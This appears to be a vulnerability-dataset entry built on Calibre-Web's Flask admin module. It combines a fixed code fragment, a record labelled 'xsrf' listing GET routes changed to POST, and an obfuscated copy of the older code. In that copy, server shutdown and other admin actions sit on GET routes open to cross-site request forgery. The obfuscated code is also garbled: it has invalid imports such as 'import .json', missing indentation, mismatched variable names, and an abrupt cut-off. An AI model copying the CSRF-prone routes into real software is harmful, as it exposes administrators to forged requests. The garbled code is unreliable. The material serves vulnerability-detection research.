        except Exception as ex:
            log.error(ex)
            flash(str(ex), category="error")
            return render_title_template("user_edit.html",
                                         translations=translations,
                                         languages=languages,
                                         mail_configured=config.get_mail_server_configured(),
                                         kobo_support=kobo_support,
                                         new_user=0,
                                         content=content,
                                         config=config,
                                         registered_oauth=oauth_check,
                                         title=_(u"Edit User %(nick)s", nick=content.name),
                                         page="edituser")
    try:
        ub.session_commit()
        flash(_(u"User '%(nick)s' updated", nick=content.name), category="success")
    except IntegrityError as ex:
        ub.session.rollback()
        log.error("An unknown error occurred while changing user: {}".format(str(ex)))
        flash(_(u"An unknown error occurred. Please try again later."), category="error")
    except OperationalError:
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
    return ""
@admi.route("/admin/user/new", methods=["GET", "POST"])
@login_required
@admin_required
def new_user():
    """Show the create-user form (GET) or create the account (POST)."""
    content = ub.User()
    languages = calibre_db.speaking_language()
    translations = [LC('en')] + babel.list_translations()
    kobo_support = feature_support['kobo'] and config.config_kobo_sync
    if request.method == "POST":
        to_save = request.form.to_dict()
        # Fix: propagate the helper's response (redirect on success, error
        # page on validation failure) instead of discarding it; this mirrors
        # how edit_user handles _handle_edit_user's return value.
        res = _handle_new_user(to_save, content, languages, translations, kobo_support)
        if res:
            return res
    else:
        # Pre-fill the form with the configured defaults for new accounts.
        content.role = config.config_default_role
        content.sidebar_view = config.config_default_show
        content.locale = config.config_default_locale
        content.default_language = config.config_default_language
    return render_title_template("user_edit.html", new_user=1, content=content,
                                 config=config, translations=translations,
                                 languages=languages, title=_(u"Add new user"), page="newuser",
                                 kobo_support=kobo_support, registered_oauth=oauth_check)
@admi.route("/admin/mailsettings")
@login_required
@admin_required
def edit_mailsettings():
    """Render the e-mail server settings form with the current configuration."""
    content = config.get_mail_settings()
    return render_title_template("email_edit.html", content=content, title=_(u"Edit E-mail Server Settings"),
                                 page="mailset", feature_support=feature_support)
@admi.route("/admin/mailsettings", methods=["POST"])
@login_required
@admin_required
def update_mailsettings():
    """Persist the posted e-mail server settings.

    Supports three form variants: invalidating a stored Gmail OAuth token,
    running the Gmail OAuth setup, or saving plain SMTP settings. An optional
    "test" flag queues a test e-mail to the current user. Always re-renders
    the settings page via ``edit_mailsettings``.
    """
    to_save = request.form.to_dict()
    _config_int(to_save, "mail_server_type")
    if to_save.get("invalidate"):
        # Drop the stored Gmail OAuth token.
        config.mail_gmail_token = {}
        try:
            flag_modified(config, "mail_gmail_token")
        except AttributeError:
            pass
    elif to_save.get("gmail"):
        try:
            config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
            flash(_(u"Gmail Account Verification Successful"), category="success")
        except Exception as ex:
            flash(str(ex), category="error")
            log.error(ex)
            return edit_mailsettings()
    else:
        # Plain SMTP configuration.
        _config_string(to_save, "mail_server")
        _config_int(to_save, "mail_port")
        _config_int(to_save, "mail_use_ssl")
        _config_string(to_save, "mail_login")
        _config_string(to_save, "mail_password")
        _config_string(to_save, "mail_from")
        # Form value is in MiB; store bytes.
        _config_int(to_save, "mail_size", lambda y: int(y)*1024*1024)
    try:
        config.save()
    except (OperationalError, InvalidRequestError):
        ub.session.rollback()
        log.error("Settings DB is not Writeable")
        flash(_("Settings DB is not Writeable"), category="error")
        return edit_mailsettings()
    if to_save.get("test"):
        if current_user.email:
            result = send_test_mail(current_user.email, current_user.name)
            if result is None:
                flash(_(u"Test e-mail queued for sending to %(email)s, please check Tasks for result",
                        email=current_user.email), category="info")
            else:
                flash(_(u"There was an error sending the Test e-mail: %(res)s", res=result), category="error")
        else:
            flash(_(u"Please configure your e-mail address first..."), category="error")
    else:
        flash(_(u"E-mail server settings updated"), category="success")
    return edit_mailsettings()
@admi.route("/admin/user/<int:user_id>", methods=["GET", "POST"])
@login_required
@admin_required
def edit_user(user_id):
    """Render (GET) or process (POST) the edit form for an existing user.

    Unknown users — and the "Guest" account while anonymous browsing is
    disabled — redirect back to the admin overview.
    """
    content = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()  # type: ub.User
    if not content or (not config.config_anonbrowse and content.name == "Guest"):
        flash(_(u"User not found"), category="error")
        return redirect(url_for('admin.admin'))
    languages = calibre_db.speaking_language(return_all_languages=True)
    translations = babel.list_translations() + [LC('en')]
    kobo_support = feature_support['kobo'] and config.config_kobo_sync
    if request.method == "POST":
        to_save = request.form.to_dict()
        # Helper returns "" on plain success, or a redirect/error response.
        resp = _handle_edit_user(to_save, content, languages, translations, kobo_support)
        if resp:
            return resp
    return render_title_template("user_edit.html",
                                 translations=translations,
                                 languages=languages,
                                 new_user=0,
                                 content=content,
                                 config=config,
                                 registered_oauth=oauth_check,
                                 mail_configured=config.get_mail_server_configured(),
                                 kobo_support=kobo_support,
                                 title=_(u"Edit User %(nick)s", nick=content.name),
                                 page="edituser")
@admi.route("/admin/resetpassword/<int:user_id>", methods=["POST"])
@login_required
@admin_required
def reset_user_password(user_id):
    """Generate a new password for *user_id*, mail it, and flash the outcome.

    ``reset_password`` reports 1 on success, 0 on an unspecified failure,
    and any other value when mail is not configured yet.
    """
    if current_user is None or not current_user.is_authenticated:
        return redirect(url_for('admin.admin'))
    status, message = reset_password(user_id)
    if status == 1:
        log.debug(u"Password for user %s reset", message)
        flash(_(u"Password for user %(user)s reset", user=message), category="success")
    elif status == 0:
        log.error(u"An unknown error occurred. Please try again later.")
        flash(_(u"An unknown error occurred. Please try again later."), category="error")
    else:
        log.error(u"Please configure the SMTP mail settings first...")
        flash(_(u"Please configure the SMTP mail settings first..."), category="error")
    return redirect(url_for('admin.admin'))
@admi.route("/admin/logfile")
@login_required
@admin_required
def view_logfile():
    """Render the in-browser log viewer for the app log (0) and access log (1)."""
    logfiles = {0: logger.get_logfile(config.config_logfile),
                1: logger.get_accesslogfile(config.config_access_logfile)}
    return render_title_template("logviewer.html",
                                 title=_(u"Logfile viewer"),
                                 accesslog_enable=config.config_access_log,
                                 log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
                                 logfiles=logfiles,
                                 page="logfile")
@admi.route("/ajax/log/<int:logtype>")
@login_required
@admin_required
def send_logfile(logtype):
    """Stream the requested log file: 0 = application log, 1 = access log.

    Any other value yields an empty response body.
    """
    if logtype == 1:
        path = logger.get_accesslogfile(config.config_access_logfile)
    elif logtype == 0:
        path = logger.get_logfile(config.config_logfile)
    else:
        return ""
    return send_from_directory(os.path.dirname(path), os.path.basename(path))
@admi.route("/admin/logdownload/<int:logtype>")
@login_required
@admin_required
def download_log(logtype):
    """Offer the assembled log files for download (0 = app log, 1 = access log).

    Unknown log types and invalid log destinations (e.g. stdout) 404.
    """
    resolvers = {
        0: lambda: logger.get_logfile(config.config_logfile),
        1: lambda: logger.get_accesslogfile(config.config_access_logfile),
    }
    try:
        file_name = resolvers[logtype]()
    except KeyError:
        abort(404)
    if not logger.is_valid_logfile(file_name):
        abort(404)
    return debug_info.assemble_logfiles(file_name)
@admi.route("/admin/debug")
@login_required
@admin_required
def download_debug():
    """Send the debug-information bundle assembled by debug_info."""
    return debug_info.send_debug()
@admi.route("/get_update_status", methods=['GET'])
@login_required
@admin_required
def get_update_status():
    """Report available updates, or an empty string when the updater is disabled."""
    if not feature_support['updater']:
        return ''
    log.info(u"Update status requested")
    return updater_thread.get_available_updates(request.method, locale=get_locale())
@admi.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@admin_required
def get_updater_status():
    """Start an update (POST with start=True) or poll its progress (GET).

    Returns a JSON object: on start it contains the translated progress
    message table plus the initial status; on poll only the numeric status
    code from the updater thread. Returns '' when the updater feature is
    disabled.
    """
    status = {}
    if feature_support['updater']:
        if request.method == "POST":
            commit = request.form.to_dict()
            if "start" in commit and commit['start'] == 'True':
                # Numeric status -> human readable progress text, consumed by
                # the frontend while polling.
                text = {
                    "1": _(u'Requesting update package'),
                    "2": _(u'Downloading update package'),
                    "3": _(u'Unzipping update package'),
                    "4": _(u'Replacing files'),
                    "5": _(u'Database connections are closed'),
                    "6": _(u'Stopping server'),
                    "7": _(u'Update finished, please press okay and reload page'),
                    "8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
                    "9": _(u'Update failed:') + u' ' + _(u'Connection error'),
                    "10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
                    "11": _(u'Update failed:') + u' ' + _(u'General error'),
                    "12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
                    "13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
                }
                status['text'] = text
                # Kick off the updater thread.
                updater_thread.status = 0
                updater_thread.resume()
                status['status'] = updater_thread.get_update_status()
        elif request.method == "GET":
            try:
                status['status'] = updater_thread.get_update_status()
                # -1 means the thread already finished; map to "finished" (7).
                if status['status'] == -1:
                    status['status'] = 7
            except Exception:
                status['status'] = 11
        return json.dumps(status)
    return ''
def ldap_import_create_user(user, user_data):
    """Create a local account from one LDAP search result.

    Args:
        user: the raw LDAP user string (DN or plain login) being imported.
        user_data: the attribute dict returned by the LDAP server.

    Returns:
        A tuple ``(created_count, message)`` where created_count is 1 on
        success and 0 otherwise; message is a translated error text or None
        for silently skipped duplicates.
    """
    # The login attribute name is derived from the configured user filter.
    user_login_field = extract_dynamic_field_from_filter(user, config.config_ldap_user_object)
    try:
        username = user_data[user_login_field][0].decode('utf-8')
    except KeyError as ex:
        log.error("Failed to extract LDAP user: %s - %s", user, ex)
        message = _(u'Failed to extract at least One LDAP User')
        return 0, message
    # check for duplicate username
    if ub.session.query(ub.User).filter(func.lower(ub.User.name) == username.lower()).first():
        # if ub.session.query(ub.User).filter(ub.User.name == username).first():
        log.warning("LDAP User %s Already in Database", user_data)
        return 0, None
    kindlemail = ''
    if 'mail' in user_data:
        useremail = user_data['mail'][0].decode('utf-8')
        # A second mail attribute value is treated as the kindle address.
        if len(user_data['mail']) > 1:
            kindlemail = user_data['mail'][1].decode('utf-8')
    else:
        # Fall back to a synthetic address when LDAP has no mail attribute.
        log.debug('No Mail Field Found in LDAP Response')
        useremail = username + '@email.com'
    try:
        # check for duplicate email
        useremail = check_email(useremail)
    except Exception as ex:
        log.warning("LDAP Email Error: {}, {}".format(user_data, ex))
        return 0, None
    content = ub.User()
    content.name = username
    content.password = ''  # dummy password which will be replaced by ldap one
    content.email = useremail
    content.kindle_mail = kindlemail
    # Imported users start with the configured defaults and restrictions.
    content.default_language = config.config_default_language
    content.locale = config.config_default_locale
    content.role = config.config_default_role
    content.sidebar_view = config.config_default_show
    content.allowed_tags = config.config_allowed_tags
    content.denied_tags = config.config_denied_tags
    content.allowed_column_value = config.config_allowed_column_value
    content.denied_column_value = config.config_denied_column_value
    ub.session.add(content)
    try:
        ub.session.commit()
        return 1, None  # increase no of users
    except Exception as ex:
        log.warning("Failed to create LDAP user: %s - %s", user, ex)
        ub.session.rollback()
        message = _(u'Failed to Create at Least One LDAP User')
        return 0, message
@admi.route('/import_ldap_users', methods=["POST"])
@login_required
@admin_required
def import_ldap_users():
    """Import all members of the configured LDAP group as local users.

    Returns a JSON object with a single translated "text" message describing
    the outcome (count imported, or the first/last error encountered).
    """
    showtext = {}
    try:
        new_users = services.ldap.get_group_members(config.config_ldap_group_name)
    except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
        log.debug_or_exception(e)
        showtext['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
        return json.dumps(showtext)
    if not new_users:
        log.debug('LDAP empty response')
        showtext['text'] = _(u'Error: No user returned in response of LDAP server')
        return json.dumps(showtext)
    imported = 0
    for username in new_users:
        user = username.decode('utf-8')
        if '=' in user:
            # Group member looks like a DN; pick the filter used to extract
            # the login attribute from it.
            # if member object field is empty take user object as filter
            if config.config_ldap_member_user_object:
                query_filter = config.config_ldap_member_user_object
            else:
                query_filter = config.config_ldap_user_object
            try:
                user_identifier = extract_user_identifier(user, query_filter)
            except Exception as ex:
                log.warning(ex)
                continue
        else:
            # Plain login name; query LDAP with the default filter.
            user_identifier = user
            query_filter = None
        try:
            user_data = services.ldap.get_object_details(user=user_identifier, query_filter=query_filter)
        except AttributeError as ex:
            log.debug_or_exception(ex)
            continue
        if user_data:
            user_count, message = ldap_import_create_user(user, user_data)
            if message:
                showtext['text'] = message
            else:
                imported += user_count
        else:
            log.warning("LDAP User: %s Not Found", user)
            showtext['text'] = _(u'At Least One LDAP User Not Found in Database')
    if not showtext:
        showtext['text'] = _(u'{} User Successfully Imported'.format(imported))
    return json.dumps(showtext)
def extract_user_data_from_field(user, field):
    """Return the value of attribute *field* from a DN-style LDAP string.

    Example: ``extract_user_data_from_field("cn=John Doe,ou=users", "cn")``
    yields ``"John Doe"``. Raises Exception when the attribute is absent.
    """
    pattern = field + r"=([\.\d\s\w-]+)"
    found = re.search(pattern, user, re.IGNORECASE | re.UNICODE)
    if found is None:
        raise Exception("Could Not Parse LDAP User: {}".format(user))
    return found.group(1)
def extract_dynamic_field_from_filter(user, filtr):
    """Return the attribute name bound to the ``%s`` placeholder in the LDAP
    filter *filtr* (e.g. ``"(&(objectClass=person)(uid=%s))"`` -> ``"uid"``).

    Args:
        user: the user string being processed (only used for context; kept
            in the signature for caller compatibility).
        filtr: the configured LDAP filter containing ``attribute=%s``.

    Raises:
        Exception: when no ``<attribute>=%s`` pair is present in *filtr*.
    """
    match = re.search("([a-zA-Z0-9-]+)=%s", filtr, re.IGNORECASE | re.UNICODE)
    if match:
        return match.group(1)
    else:
        # Fix: the original `raise Exception("... {}", user)` passed two
        # arguments, so the placeholder was never formatted and the message
        # referenced the user instead of the unparsable filter.
        raise Exception("Could Not Parse LDAP Userfield: {}".format(filtr))
def extract_user_identifier(user, filtr):
    """Resolve the login attribute named in *filtr* and return its value
    extracted from the LDAP *user* string."""
    attribute = extract_dynamic_field_from_filter(user, filtr)
    return extract_user_data_from_field(user, attribute)
| xsrf | {
"code": [
"@admi.route(\"/shutdown\")",
" task = int(request.args.get(\"parameter\").strip())",
"@admi.route(\"/ajax/fullsync\")",
"@admi.route(\"/admin/resetpassword/<int:user_id>\")",
"@admi.route('/import_ldap_users')"
],
"line_no": [
132,
136,
909,
1629,
1805
]
} | {
"code": [
"@admi.route(\"/shutdown\", methods=[\"POST\"])",
" task = request.get_json().get('parameter', -1)",
"@admi.route(\"/ajax/fullsync\", methods=[\"POST\"])",
"@admi.route(\"/admin/resetpassword/<int:user_id>\", methods=[\"POST\"])",
"@admi.route('/import_ldap_users', methods=[\"POST\"])"
],
"line_no": [
132,
136,
909,
1629,
1805
]
} |
import os
import re
import base64
import .json
import time
import operator
from datetime import datetime, timedelta
from babel import Locale as LC
from babel.dates import .format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask_login import .login_required, VAR_62, logout_user, confirm_login
from flask_babel import gettext as _
from flask import session as flask_session
from sqlalchemy import and_
from sqlalchemy.orm.attributes import .flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import .func, or_, VAR_130
from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import .check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
VAR_0 = logger.create()
VAR_1 = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo),
'updater': constants.UPDATER_AVAILABLE,
'gmail': bool(services.gmail)
}
try:
import rarfile # pylint: disable=unused-import
VAR_1['rar'] = True
except (ImportError, SyntaxError):
VAR_1['rar'] = False
try:
from .oauth_bb import .oauth_check, VAR_96
VAR_1['oauth'] = True
except ImportError as err:
VAR_0.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
VAR_1['oauth'] = False
VAR_96 = []
VAR_97 = {}
VAR_1['gdrive'] = gdrive_support
VAR_2 = Blueprint('admin', __name__)
def FUNC_0(VAR_3):
@wraps(VAR_3)
def FUNC_71(*VAR_30, **VAR_31):
if VAR_62.role_admin():
return VAR_3(*VAR_30, **VAR_31)
abort(403)
return FUNC_71
@VAR_2.before_app_request
def FUNC_1():
if VAR_62.is_authenticated:
confirm_login()
if not ub.check_user_session(VAR_62.id, flask_session.get('_id')) and 'opds' not in request.path:
logout_user()
g.constants = constants
g.user = VAR_62
g.allow_registration = config.config_public_reg
g.allow_anonymous = config.config_anonbrowse
g.allow_upload = config.config_uploading
g.current_theme = config.config_theme
g.config_authors_max = config.config_authors_max
g.shelves_access = ub.session.query(ub.Shelf).filter(
or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == VAR_62.id)).order_by(ub.Shelf.name).all()
if '/static/' not in request.path and not config.db_configured and \
request.endpoint not in ('admin.ajax_db_config',
'admin.simulatedbchange',
'admin.db_configuration',
'web.login',
'web.logout',
'admin.load_dialogtexts',
'admin.ajax_pathchooser'):
return redirect(url_for('admin.db_configuration'))
@VAR_2.route("/admin")
@login_required
def FUNC_2():
abort(403)
@VAR_2.route("/shutdown")
@login_required
@FUNC_0
def FUNC_3():
VAR_32 = VAR_119(request.args.get("parameter").strip())
VAR_33 = {}
if VAR_32 in (0, 1): # valid commandos received
calibre_db.dispose()
ub.dispose()
if VAR_32 == 0:
VAR_33['text'] = _(u'Server restarted, please reload page')
else:
VAR_33['text'] = _(u'Performing FUNC_3 of server, please close window')
web_server.stop(VAR_32 == 0)
return json.dumps(VAR_33)
if VAR_32 == 2:
VAR_0.warning("reconnecting to calibre database")
calibre_db.reconnect_db(config, ub.app_DB_path)
VAR_33['text'] = _(u'Reconnect successful')
return json.dumps(VAR_33)
showtext['text'] = _(u'Unknown command')
return json.dumps(VAR_33), 400
@VAR_2.route("/FUNC_4/view")
@login_required
@FUNC_0
def FUNC_4():
VAR_34 = updater_thread.get_current_version_info()
if VAR_34 is False:
VAR_98 = _(u'Unknown')
else:
if 'datetime' in VAR_34:
VAR_98 = VAR_34['datetime']
VAR_117 = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
VAR_118 = datetime.strptime(VAR_98[:19], "%Y-%m-%dT%H:%M:%S")
if len(VAR_98) > 19: # VAR_66 if string has timezone
if VAR_98[19] == '+':
VAR_118 -= timedelta(hours=VAR_119(VAR_98[20:22]), minutes=VAR_119(VAR_98[23:]))
elif VAR_98[19] == '-':
VAR_118 += timedelta(hours=VAR_119(VAR_98[20:22]), minutes=VAR_119(VAR_98[23:]))
VAR_98 = format_datetime(VAR_118 - VAR_117, format='short', VAR_58=get_locale())
else:
VAR_98 = VAR_34['version']
VAR_35 = ub.session.query(ub.User).all()
VAR_36 = config.get_mail_settings()
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
return render_title_template("admin.html", VAR_35=allUser, email=VAR_36, config=config, VAR_98=commit,
VAR_1=feature_support, VAR_25=kobo_support,
title=_(u"Admin page"), page="admin")
@VAR_2.route("/FUNC_4/dbconfig", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_5():
if request.method == "POST":
return FUNC_48()
return FUNC_51()
@VAR_2.route("/FUNC_4/config", methods=["GET"])
@login_required
@FUNC_0
def FUNC_6():
return render_title_template("config_edit.html",
config=config,
provider=VAR_96,
VAR_1=feature_support,
title=_(u"Basic Configuration"), page="config")
@VAR_2.route("/FUNC_4/ajaxconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_7():
return FUNC_49()
@VAR_2.route("/FUNC_4/ajaxdbconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_8():
return FUNC_48()
@VAR_2.route("/FUNC_4/alive", methods=["GET"])
@login_required
@FUNC_0
def FUNC_9():
return "", 200
@VAR_2.route("/FUNC_4/viewconfig")
@login_required
@FUNC_0
def FUNC_10():
VAR_37 = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
VAR_38 = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
VAR_23 = calibre_db.speaking_language()
VAR_24 = [LC('en')] + babel.list_translations()
return render_title_template("config_view_edit.html", conf=config, readColumns=VAR_37,
restrictColumns=VAR_38,
VAR_23=languages,
VAR_24=translations,
title=_(u"UI Configuration"), page="uiconfig")
@VAR_2.route("/FUNC_4/usertable")
@login_required
@FUNC_0
def FUNC_11():
VAR_39 = VAR_62.view_settings.get('useredit', {})
VAR_23 = calibre_db.speaking_language()
VAR_24 = babel.list_translations() + [LC('en')]
VAR_35 = ub.session.query(ub.User)
VAR_40 = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(VAR_130('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
if config.config_restricted_column:
VAR_99 = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
else:
VAR_99 = []
if not config.config_anonbrowse:
VAR_35 = allUser.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
return render_title_template("user_table.html",
VAR_54=VAR_35.all(),
VAR_40=tags,
VAR_99=custom_values,
VAR_24=translations,
VAR_23=languages,
visiblility=VAR_39,
all_roles=constants.ALL_ROLES,
VAR_25=kobo_support,
sidebar_settings=constants.sidebar_settings,
title=_(u"Edit Users"),
page="usertable")
@VAR_2.route("/ajax/listusers")
@login_required
@FUNC_0
def FUNC_12():
VAR_41 = VAR_119(request.args.get("offset") or 0)
VAR_42 = VAR_119(request.args.get("limit") or 10)
VAR_43 = request.args.get("search")
VAR_44 = request.args.get("sort", "id")
VAR_45 = request.args.get("order", "").lower()
VAR_46 = None
if VAR_44 == "state":
VAR_46 = json.loads(request.args.get("state", "[]"))
if VAR_44 != "state" and VAR_45:
VAR_45 = VAR_130(VAR_44 + " " + VAR_45)
elif not VAR_46:
VAR_45 = ub.User.id.asc()
VAR_47 = ub.session.query(ub.User)
if not config.config_anonbrowse:
VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
VAR_48 = VAR_49 = VAR_47.count()
if VAR_43:
VAR_47 = VAR_47.filter(or_(VAR_18.lower(ub.User.name).ilike("%" + VAR_43 + "%"),
VAR_18.lower(ub.User.kindle_mail).ilike("%" + VAR_43 + "%"),
VAR_18.lower(ub.User.email).ilike("%" + VAR_43 + "%")))
if VAR_46:
VAR_54 = calibre_db.get_checkbox_sorted(VAR_47.all(), VAR_46, VAR_41, VAR_42, request.args.get("order", "").lower())
else:
VAR_54 = VAR_47.order_by(VAR_45).offset(VAR_41).limit(VAR_42).all()
if VAR_43:
VAR_49 = len(VAR_54)
for VAR_12 in VAR_54:
if VAR_12.default_language == "all":
VAR_12.default = _("All")
else:
VAR_12.default = LC.parse(VAR_12.default_language).get_language_name(get_locale())
VAR_50 = {'totalNotFiltered': VAR_48, 'total': VAR_49, "rows": VAR_54}
VAR_51 = json.dumps(VAR_50, cls=db.AlchemyEncoder)
VAR_52 = make_response(VAR_51)
VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_52
@VAR_2.route("/ajax/deleteuser", methods=['POST'])
@login_required
@FUNC_0
def FUNC_13():
    # Delete a single user ("userid") or a selection ("userid[]").
    # Answers with a JSON list of flash-style {type, message} entries.
    VAR_53 = request.form.to_dict(flat=False)
    VAR_54 = None
    if "userid[]" in VAR_53:
        VAR_54 = ub.session.query(ub.User).filter(ub.User.id.in_(VAR_53['userid[]'])).all()
    elif "userid" in VAR_53:
        VAR_54 = ub.session.query(ub.User).filter(ub.User.id == VAR_53['userid'][0]).all()
    VAR_55 = 0        # number of successfully deleted users
    VAR_56 = list()   # collected per-user error messages
    VAR_57 = list()
    if not VAR_54:
        VAR_0.error("User not found")
        return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
    for VAR_12 in VAR_54:
        try:
            # FUNC_53 raises when the user may not be deleted (e.g. last admin)
            VAR_71 = FUNC_53(VAR_12)
            VAR_55 += 1
        except Exception as ex:
            VAR_0.error(ex)
            VAR_56.append({'type': "danger", 'message': str(ex)})
    if VAR_55 == 1:
        VAR_0.info("User {} deleted".format(VAR_53))
        VAR_57 = [{'type': "success", 'message': VAR_71}]
    elif VAR_55 > 1:
        VAR_0.info("Users {} deleted".format(VAR_53))
        VAR_57 = [{'type': "success", 'message': _("{} VAR_54 deleted successfully").format(VAR_55)}]
    VAR_57.extend(VAR_56)
    return Response(json.dumps(VAR_57), mimetype='application/json')
@VAR_2.route("/ajax/getlocale")
@login_required
@FUNC_0
def FUNC_14():
    """Return the available UI locales as a JSON list of value/text pairs."""
    current = get_locale()
    available = babel.list_translations() + [LC('en')]
    return json.dumps([{'value': str(entry), 'text': entry.get_language_name(current)}
                       for entry in available])
@VAR_2.route("/ajax/getdefaultlanguage")
@login_required
@FUNC_0
def FUNC_15():
    """Return selectable default book languages, preceded by an 'all' entry."""
    choices = [{'value': 'all', 'text': _('Show All')}]
    choices.extend({'value': lang.lang_code, 'text': lang.name}
                   for lang in calibre_db.speaking_language())
    return json.dumps(choices)
@VAR_2.route("/ajax/editlistusers/<VAR_4>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_16(VAR_4):
    """Inline-edit one user column (VAR_4) for one ("pk") or many ("pk[]") users.

    Returns "" on success, or (message, 400) / a JSON danger response on error.

    Fix: the single-bit sanity checks for role and sidebar flags referenced an
    undefined name ``value`` (NameError at runtime); they now test the parsed
    bit itself — ``VAR_125 & (VAR_125 - 1) == 0`` holds only for powers of two.
    """
    VAR_61 = request.form.to_dict(flat=False)
    VAR_47 = ub.session.query(ub.User)
    if not config.config_anonbrowse:
        # never expose/edit the anonymous account unless anon browsing is on
        VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
    if "pk" in VAR_61:
        VAR_54 = [VAR_47.filter(ub.User.id == VAR_61['pk'][0]).one_or_none()]
    else:
        if "pk[]" in VAR_61:
            VAR_54 = VAR_47.filter(ub.User.id.in_(VAR_61['pk[]'])).all()
        else:
            return _("Malformed request"), 400
    if 'field_index' in VAR_61:
        VAR_61['field_index'] = VAR_61['field_index'][0]
    if 'value' in VAR_61:
        VAR_61['value'] = VAR_61['value'][0]
    elif not ('value[]' in VAR_61):
        return _("Malformed request"), 400
    for VAR_12 in VAR_54:
        try:
            if VAR_4 in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
                if 'value[]' in VAR_61:
                    setattr(VAR_12, VAR_4, FUNC_29(VAR_12, VAR_61['action'][0], VAR_4, VAR_61['value[]']))
                else:
                    setattr(VAR_12, VAR_4, VAR_61['value'].strip())
            else:
                VAR_61['value'] = VAR_61['value'].strip()
                if VAR_4 == 'name':
                    if VAR_12.name == "Guest":
                        raise Exception(_("Guest Name can't be changed"))
                    VAR_12.name = check_username(VAR_61['value'])
                elif VAR_4 == 'email':
                    VAR_12.email = check_email(VAR_61['value'])
                elif VAR_4 == 'kobo_only_shelves_sync':
                    VAR_12.kobo_only_shelves_sync = VAR_119(VAR_61['value'] == 'true')
                elif VAR_4 == 'kindle_mail':
                    VAR_12.kindle_mail = valid_email(VAR_61['value']) if VAR_61['value'] else ""
                elif VAR_4.endswith('role'):
                    VAR_125 = VAR_119(VAR_61['field_index'])
                    if VAR_12.name == "Guest" and VAR_125 in \
                            [constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
                        raise Exception(_("Guest can't have this role"))
                    # accept only a single, in-range role bit (power of two)
                    if VAR_125 > 0 and VAR_125 <= constants.ROLE_VIEWER and (VAR_125 & (VAR_125 - 1) == 0 or VAR_125 == 1):
                        if VAR_61['value'] == 'true':
                            VAR_12.role |= VAR_125
                        elif VAR_61['value'] == 'false':
                            if VAR_125 == constants.ROLE_ADMIN:
                                # refuse to strip the last remaining admin
                                if not ub.session.query(ub.User).\
                                        filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
                                               ub.User.id != VAR_12.id).count():
                                    return Response(
                                        json.dumps([{'type': "danger",
                                                     'message':_(u"No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role",
                                                                 nick=VAR_12.name)}]), mimetype='application/json')
                            VAR_12.role &= ~VAR_125
                        else:
                            raise Exception(_("Value has to be true or false"))
                    else:
                        raise Exception(_("Invalid role"))
                elif VAR_4.startswith('sidebar'):
                    VAR_125 = VAR_119(VAR_61['field_index'])
                    if VAR_12.name == "Guest" and VAR_125 == constants.SIDEBAR_READ_AND_UNREAD:
                        raise Exception(_("Guest can't have this view"))
                    # same single-bit check as for roles
                    if VAR_125 > 0 and VAR_125 <= constants.SIDEBAR_LIST and (VAR_125 & (VAR_125 - 1) == 0 or VAR_125 == 1):
                        if VAR_61['value'] == 'true':
                            VAR_12.sidebar_view |= VAR_125
                        elif VAR_61['value'] == 'false':
                            VAR_12.sidebar_view &= ~VAR_125
                        else:
                            raise Exception(_("Value has to be true or false"))
                    else:
                        raise Exception(_("Invalid view"))
                elif VAR_4 == 'locale':
                    if VAR_12.name == "Guest":
                        raise Exception(_("Guest's Locale is determined automatically and can't be set"))
                    if VAR_61['value'] in _BABEL_TRANSLATIONS:
                        VAR_12.locale = VAR_61['value']
                    else:
                        raise Exception(_("No Valid Locale Given"))
                elif VAR_4 == 'default_language':
                    VAR_23 = calibre_db.session.query(db.Languages) \
